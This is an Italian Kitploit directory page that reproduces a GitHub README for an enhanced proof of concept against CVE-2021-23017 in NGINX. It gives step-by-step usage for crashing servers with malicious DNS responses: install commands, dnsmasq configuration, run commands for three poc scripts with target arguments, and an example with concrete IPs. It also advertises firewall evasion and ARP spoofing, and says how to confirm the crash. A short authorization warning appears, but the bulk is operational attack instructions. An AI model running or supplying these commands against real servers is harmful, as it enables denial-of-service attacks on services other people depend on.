Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
EVIL-CVE-2021-23017-Update-2025 — vulnerabilità nei server NGINX (versioni 0.6.18–1.20.0). Gli script mirano a causare un Denial of Service (DoS) inviando risposte DNS maligne, con miglioramenti per aggirare i firewall. | Kitploit
Strumenti/GitHubGitHub/6lj/evil-cve-2021-23017-update-2025
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingAnalisi DNS
GitHub6lj/evil-cve-2021-23017-update-2025

EVIL-CVE-2021-23017-Update-2025

vulnerabilità nei server NGINX (versioni 0.6.18–1.20.0). Gli script mirano a causare un Denial of Service (DoS) inviando risposte DNS maligne, con miglioramenti per aggirare i firewall.

Vedi Repository
111 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

vulnerabilità nei server NGINX (versioni 0.6.18–1.20.0). Gli script mirano a causare un Denial of Service (DoS) inviando risposte DNS malevole, con miglioramenti per bypassare i firewall. Questa è una versione migliorata del PoC originale da M507/CVE-2021-23017-PoC .

Avvertenza: Utilizzare solo con esplicita autorizzazione scritta del proprietario del sistema. I test non autorizzati sono illegali.

Requisiti

  • Ambiente: Linux (es., Kali Linux, tramite Termux/setup virtualizzato).
  • Dipendenze:
    root@kitploit:~
    sudo apt-get update
    sudo apt-get install python3-scapy dnsmasq
    pip3 install scapy requests
    
  • Rete: Stessa sottorete del target per ARP spoofing, oppure il NGINX target deve utilizzare il tuo IP del server DNS.

Installazione

  1. Clona il repository:
    root@kitploit:~
    git clone https://github.com/6lj/EVIL-CVE-2021-23017-Update-2025.git
    cd EVIL-CVE-2021-23017-Update-2025
    
  2. Configura dnsmasq:
    root@kitploit:~
    sudo nano /etc/dnsmasq.conf
    
    Aggiungi: Avvia:
root@kitploit:~
address=/test.example.com/192.168.1.100
root@kitploit:~
sudo systemctl start dnsmasq

Cosa fa

  • Invia risposte DNS malevole con un nome di dominio lungo (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.test.com) per crashare il server NGINX.
  • Attiva query DNS usando curl e dig per sfruttare la vulnerabilità.
  • Bypassa i firewall inviando pacchetti DNS diretti e usando processi paralleli.

Differenze dall'originale

Rispetto a M507/CVE-2021-23017-PoC:

  • Bypass firewall migliorato: Usa processi paralleli in poc1.2.3.py per sniffing, invio DNS e attivazione query simultanei, devi eseguire i tre insieme.
  • Consegna pacchetti ottimizzata: Maggiore frequenza di pacchetti e query per eludere i filtri firewall.
  • Controllo sottorete: Verifica la compatibilità di rete per l'ARP spoofing, migliorando l'affidabilità.

Utilizzo

Esegui i tre insieme ed esegui con gli argomenti appropriati (sostituisci <target_ip>, <your_dns_server_ip>, <target_url>).

poc.py

root@kitploit:~
python3 poc.py --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Sniffa e risponde alle query DNS.

poc2.py

root@kitploit:~
python3 poc2.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --count 50 --target_url http://<target_url>
  • Aggiunge invio DNS diretto e attivazione di query.

poc3.py (Consigliato)

root@kitploit:~
python3 poc3.py --target <target_ip> --dns_server <your_dns_server_ip> --iface eth0 --target_url http://<target_url>
  • Esegue attività in parallelo per la massima efficienza.

Esempio

root@kitploit:~
python3 poc3.py --target 192.168.1.100 --dns_server 192.168.1.101 --iface eth0 --target_url http://192.168.1.100

Verifica dei risultati

  • Controlla lo stato del server:

    root@kitploit:~
    curl -I http://<target_url>
    
    • Successo: 502 Bad Gateway o 503 Service Unavailable indica un crash del server.
    • Fallimento: 200 OK suggerisce assenza di vulnerabilità o blocco firewall.
  • Monitora il traffico DNS:

    root@kitploit:~
    sudo wireshark -f "udp port 53"
    

Dichiarazione di non responsabilità: Solo a scopo educativo. Gli autori non sono responsabili per un uso improprio.

Scarica lo strumento